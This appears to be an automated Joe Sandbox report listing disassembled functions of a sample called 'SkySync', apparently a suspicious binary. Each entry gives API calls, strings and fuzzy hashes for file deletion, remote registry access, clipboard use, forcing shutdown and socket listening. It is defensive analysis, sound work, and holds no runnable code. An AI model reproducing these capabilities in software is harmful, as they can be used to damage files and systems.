FindFirstFileW.KERNEL32(*.*,?), ref: 00AFF7D8
SetCurrentDirectoryW.KERNEL32(?), ref: 00AFF828
SetCurrentDirectoryW.KERNEL32(00B4B578), ref: 00AFF846
FindNextFileW.KERNEL32(00000000,00000010), ref: 00AFF850
FindClose.KERNEL32(00000000), ref: 00AFF85D
FindClose.KERNEL32(00000000), ref: 00AFF86F

Part of subcall function 00AF4875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00AF4890

Strings

*.*, xrefs: 00AFF7D3

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 754ac809d2dcd3364580758c3fdf26c86ebc3bcfb47e0231a86a04b133503b29
Instruction ID: b9e60d39e8596ab7b4bd4e963ba1949911f743442ed3fbab9368eb4105ffeddc
Opcode Fuzzy Hash: 754ac809d2dcd3364580758c3fdf26c86ebc3bcfb47e0231a86a04b133503b29
Instruction Fuzzy Hash: 5F31957250021DAFDB20AFF4DC48AEEB7AC9F19361F1401A5FA04A31A2DB30DE459B50

Function 00B10A3A Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B1147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B1040D,?,?), ref: 00B11491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B10B0C
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B10BAB
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00B10C43
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00B10E82
RegCloseKey.ADVAPI32(00000000), ref: 00B10E8F

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper
String ID:
API String ID: 1724414362-0
Opcode ID: a2d81c480738a064f7f5411dc5cc7cb853869f9b0173aec5a37c3004856001c2
Instruction ID: a1bd5d0486e3e66ba6fed4e0cb2ad8082cb073e5a23bc327579781e6db7dee55
Opcode Fuzzy Hash: a2d81c480738a064f7f5411dc5cc7cb853869f9b0173aec5a37c3004856001c2
Instruction Fuzzy Hash: E1E17E31614200AFCB14EF25C991E6BBBE4EF89714F4489ADF449DB2A1DB30ED41CB51

Function 00AFCD9F Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00AFCDD0
FindClose.KERNEL32(00000000), ref: 00AFCE24
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00AFCE49
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00AFCE60
FileTimeToSystemTime.KERNEL32(?,?), ref: 00AFCE87

Strings

%02d, xrefs: 00AFCF5E, 00AFCF68, 00AFCFB6, 00AFD005, 00AFD054, 00AFD0A3
%4d, xrefs: 00AFCF10
%4d%02d%02d%02d%02d%02d, xrefs: 00AFCECD

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: FileTime$FindLocal$CloseFirstSystem
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3238362701-2428617273
Opcode ID: 91cfe0064eef5985df34d57622014f484c154c025e9730f6800f3afed8c2185e
Instruction ID: 4147297f9628920d0c8d18bb84f9193f81a23d0a503086b941d71f682950e136
Opcode Fuzzy Hash: 91cfe0064eef5985df34d57622014f484c154c025e9730f6800f3afed8c2185e
Instruction Fuzzy Hash: E7A131B2508305ABC710EFA4DA85DAFB7ECEF99704F400919F585C7192EB30EA05CB62

Function 00AF3CE2 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00AB0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA2A58,?,00008000), ref: 00AB02A4

Part of subcall function 00AF4FEC: GetFileAttributesW.KERNEL32(?,00AF3BFE), ref: 00AF4FED

FindFirstFileW.KERNEL32(?,?), ref: 00AF3D96
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00AF3E3E
MoveFileW.KERNEL32(?,?), ref: 00AF3E51
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00AF3E6E
FindNextFileW.KERNEL32(00000000,00000010), ref: 00AF3E90
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00AF3EAC

Strings

\*.*, xrefs: 00AF3D41, 00AF3D4A, 00AF3D5F

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: b0af32d9f7e89d03df153d810a386a1f7d57b8a970be21003e1dceab35ede097
Instruction ID: 1a551df8f0bda85b3e4656b65080c0b3da2dcefeaaa99f848261bd6fcd476006
Opcode Fuzzy Hash: b0af32d9f7e89d03df153d810a386a1f7d57b8a970be21003e1dceab35ede097
Instruction Fuzzy Hash: 39512C3280114DAACF15EBE0DA929FEB7B9AF15301F604165F546B7192EF316F09CB60

Function 00B04830 Relevance: 13.6, APIs: 9, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00B04857
EmptyClipboard.USER32 ref: 00B0485D
GlobalAlloc.KERNEL32(00000002,?), ref: 00B04872
CloseClipboard.USER32 ref: 00B04911

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 93ba1ffac2872b448570965f9588f1a2a938b1917ea78566855cbad03891346a
Instruction ID: 974f3a7fe360231015928c7a77ea0dffc12595a674868579e87f8516f77b044b
Opcode Fuzzy Hash: 93ba1ffac2872b448570965f9588f1a2a938b1917ea78566855cbad03891346a
Instruction Fuzzy Hash: 2F21A3353152109FDB11AF60ED49F2E7BE8EF44711F008159FA059B2B2DF70AD128B94

Function 00AF443D Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,?,0000000E), ref: 00AF4488
LoadResource.KERNEL32(?,00000000), ref: 00AF4494
LockResource.KERNEL32(00000000), ref: 00AF44A1
FindResourceW.KERNEL32(?,?,00000003), ref: 00AF44C1
LoadResource.KERNEL32(?,00000000), ref: 00AF44D3
SizeofResource.KERNEL32(?,00000000), ref: 00AF44E2
LockResource.KERNEL32(?), ref: 00AF44EE
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00AF454F

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Resource$FindLoadLock$CreateFromIconSizeof
String ID:
API String ID: 2263570339-0
Opcode ID: fee00ad1180223beff464b9e6a22e02f7ff6a65122efe917fadf0e8e313ab1ac
Instruction ID: 344ce388aa3b29452fbd72f314cab81e7ececf71100fc2378176a0536613e67e
Opcode Fuzzy Hash: fee00ad1180223beff464b9e6a22e02f7ff6a65122efe917fadf0e8e313ab1ac
Instruction Fuzzy Hash: 5131617250121AABDB11AFA0ED48EBB7BADEF08341F044415FA16E7151EB34DE11CBA1

Function 00AF4005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00AB0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA2A58,?,00008000), ref: 00AB02A4

Part of subcall function 00AF4FEC: GetFileAttributesW.KERNEL32(?,00AF3BFE), ref: 00AF4FED

FindFirstFileW.KERNEL32(?,?), ref: 00AF407C
DeleteFileW.KERNEL32(?,?,?,?), ref: 00AF40CC
FindNextFileW.KERNEL32(00000000,00000010), ref: 00AF40DD
FindClose.KERNEL32(00000000), ref: 00AF40F4
FindClose.KERNEL32(00000000), ref: 00AF40FD

Strings

\*.*, xrefs: 00AF404E

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 33cc58c62a7676cb614d8bedda64e9f419b2430db3ef55beda7ef09098971746
Instruction ID: a61eaf9e0f56305ba24ce80b5c10a141062e9ea900e79e31cee774bd978b12bc
Opcode Fuzzy Hash: 33cc58c62a7676cb614d8bedda64e9f419b2430db3ef55beda7ef09098971746
Instruction Fuzzy Hash: 93317E31018349ABC210FFA4D9959AFB7A8BE96315F440A2DF5E5831D2EF24DA09C762

Function 00AF5778 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00AE9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AE93E3
Part of subcall function 00AE9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AE9410
Part of subcall function 00AE9399: GetLastError.KERNEL32 ref: 00AE941D

ExitWindowsEx.USER32(?,00000000), ref: 00AF57B4

Strings

, xrefs: 00AF57A2
@, xrefs: 00AF57A7
SeShutdownPrivilege, xrefs: 00AF5784

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 26f21769f68fa8ad288832e08da7bd48f942024fde4d63002a4013e57452ec81
Instruction ID: 74b435f0cd1df45d5244e23018bec938963e1efaacb1e7bc86c197d9938758ab
Opcode Fuzzy Hash: 26f21769f68fa8ad288832e08da7bd48f942024fde4d63002a4013e57452ec81
Instruction Fuzzy Hash: F801F731E5471EEBE73873F69C8AFBBB268AB04740F100929FB53D70D2D9505C008190

Function 00B0696E Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00B069C7
WSAGetLastError.WSOCK32(00000000), ref: 00B069D6
bind.WSOCK32(00000000,?,00000010), ref: 00B069F2
listen.WSOCK32(00000000,00000005), ref: 00B06A01
WSAGetLastError.WSOCK32(00000000), ref: 00B06A1B
closesocket.WSOCK32(00000000,00000000), ref: 00B06A2F

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 996bebc631f4ef44a5e9f770f324d57e2fd5d217ac6e9c7eb8dfff2ab6375495
Instruction ID: a126ec5dda8acc7eea3d02f92a084cf359a6635bc69d53bd9b0c3252907d4398
Opcode Fuzzy Hash: 996bebc631f4ef44a5e9f770f324d57e2fd5d217ac6e9c7eb8dfff2ab6375495
Instruction Fuzzy Hash: 5B2181347006049FCB10FF64C989A6EB7E9EF48714F148559F856AB2E1CB70AD018B91

Function 00AFFA36 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00AFFA83
FindClose.KERNEL32(00000000), ref: 00AFFB96

Part of subcall function 00A952B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A952E6

Sleep.KERNEL32(0000000A), ref: 00AFFAB3
FindNextFileW.KERNEL32(?,?), ref: 00AFFB80

Strings

*.*, xrefs: 00AFFA68

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Find$File$CloseFirstMessageNextPeekSleep
String ID: *.*
API String ID: 3760556078-438819550
Opcode ID: 7c221df98900045abd640549c4728b3ec5a40260c78dcf2660d8a3b8a648cbe7
Instruction ID: f1319973b0705f6fe17268e04703f7de372b4960ca28354a2bd4b35d59563ace
Opcode Fuzzy Hash: 7c221df98900045abd640549c4728b3ec5a40260c78dcf2660d8a3b8a648cbe7
Instruction Fuzzy Hash: A9417E7190021EAFDF24EFA4CD59AEEBBB4FF05350F144166F919A32A1EB309A44CB50

Function 00A91663 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00A929E2: GetWindowLongW.USER32(?,000000EB), ref: 00A929F3

DefDlgProcW.USER32(?,?,?,?,?), ref: 00A91DD6
GetSysColor.USER32(0000000F), ref: 00A91E2A
SetBkColor.GDI32(?,00000000), ref: 00A91E3D

Part of subcall function 00A9166C: DefDlgProcW.USER32(?,00000020,?), ref: 00A916B4

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 621ebdcd2300f416c120825cad296aa1dd51a3bd3a18af42956ceb0d70df2500
Instruction ID: 537fdf661e15203c61a5d2ba8bd09237f3c0a094531146bbbe86397e05a8f08f
Opcode Fuzzy Hash: 621ebdcd2300f416c120825cad296aa1dd51a3bd3a18af42956ceb0d70df2500
Instruction Fuzzy Hash: F6A14874329506BAEE28AB699C4AFBF3AEDDF45302F15050EF402D6191CF269D01D276

Function 00B06E32 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00B08475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B084A0

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00B06E89
WSAGetLastError.WSOCK32(00000000), ref: 00B06EB2
bind.WSOCK32(00000000,?,00000010), ref: 00B06EEB
WSAGetLastError.WSOCK32(00000000), ref: 00B06EF8
closesocket.WSOCK32(00000000,00000000), ref: 00B06F0C

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 69a656ad36fa834ae5588dba6ce1c3981edca100be3cb30993f0e038936f32d9
Instruction ID: f5ccdbb547e1719cf2ce70a6eb4a2d7bddbfa231cecd5184c70bda846d65dee1
Opcode Fuzzy Hash: 69a656ad36fa834ae5588dba6ce1c3981edca100be3cb30993f0e038936f32d9
Instruction Fuzzy Hash: 0641BF75700210AFDF20AF64D986F6E77E8EB48B14F048558F916AB3D2DE709D028BA1

Function 00B159B3 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00B15A02
IsWindowEnabled.USER32 ref: 00B15A10
GetForegroundWindow.USER32(?,?,00000001), ref: 00B15A1D
IsIconic.USER32 ref: 00B15A2B
IsZoomed.USER32 ref: 00B15A39

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 267425f5b01e947c4adfc26aab76477cf9e2caf270c3d197c62d62244cb7c0a7
Instruction ID: df5f46e638634336d0291d659d5ec4ce52f9e26122f60dab72de243f05f1f3ca
Opcode Fuzzy Hash: 267425f5b01e947c4adfc26aab76477cf9e2caf270c3d197c62d62244cb7c0a7
Instruction Fuzzy Hash: C211C472360911DFEB316F269C84AAE7BD9EF84761B444169F805D7241CF70ED428BE1

Function 00AD0030 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00AD0034

Strings

%.3d, xrefs: 00AD003F
WIN_XPe, xrefs: 00AD00A4

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$WIN_XPe
API String ID: 481472006-2409531811
Opcode ID: e5db2a26334c68cf91f83d9d9f8170458a64587d43d7cca7ed975911f8c46724
Instruction ID: 9d17d16b8e6e3ed4c096ca7fd1d2c20da844bbbfae8fc251871881368f4fcaa0
Opcode Fuzzy Hash: e5db2a26334c68cf91f83d9d9f8170458a64587d43d7cca7ed975911f8c46724
Instruction Fuzzy Hash: ADD01272814118FACB189A90D944FFA77BCAB04300F140093F607E2140D6359748AB22

Function 00AC416A Relevance: 4.8, APIs: 3, Instructions: 273timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00AB9E3B: EnterCriticalSection.KERNEL32(00AB1003,?,00AB9CAC,0000000D), ref: 00AB9E66

GetTimeZoneInformation.KERNEL32(00B55AF8,00000000,00000000,00000000,00000000,00000000,00B4D070,00000030,00AC3F1B,00B4D050,00000008,00AB70A8), ref: 00AC4299
WideCharToMultiByte.KERNEL32(?,00000000,00B55AFC,000000FF,?,0000003F,00000000,?), ref: 00AC4312
WideCharToMultiByte.KERNEL32(?,00000000,00B55B50,000000FF,FFFFFFFE,0000003F,00000000,?), ref: 00AC434B

Part of subcall function 00AB2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00AB9C54,00000000,00AB8D5D,00AB59C3,?), ref: 00AB2F99
Part of subcall function 00AB2F85: GetLastError.KERNEL32(00000000,?,00AB9C54,00000000,00AB8D5D,00AB59C3,?), ref: 00AB2FAB

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ByteCharMultiWide$CriticalEnterErrorFreeHeapInformationLastSectionTimeZone
String ID:
API String ID: 1184061189-0
Opcode ID: 75e25734cfa02c1ff92872e634f2159b9ef58a8eeac39458c2f1ff356446f3fd
Instruction ID: 77e0d2c62daa39bf3e7aa6100ad28f14d53bcc5dbebd857f9550e8c9a0c016a7
Opcode Fuzzy Hash: 75e25734cfa02c1ff92872e634f2159b9ef58a8eeac39458c2f1ff356446f3fd
Instruction Fuzzy Hash: ACA1AF719006469FDF249FA8D9A1FADBBB8BF49710F16015EF410AB2A1DB348D41CB28

Function 00B029BA Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00B01ED6,00000000), ref: 00B02AAD
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00B02AE4

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: ac0a1a4d2113753f9549945a221b8f2ab341f3b23bee10001b037f3a6b81a7af
Instruction ID: 3b562c78b08632f5fdad7ab9c008efc16199781adb9365b9e22bc58cff780b92
Opcode Fuzzy Hash: ac0a1a4d2113753f9549945a221b8f2ab341f3b23bee10001b037f3a6b81a7af
Instruction Fuzzy Hash: ED41A671A00209BFEB20DF54CDC9EBBBBFCEB40754F1040AAF605A7191DA719E499B60

Function 00AE9399 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AE93E3
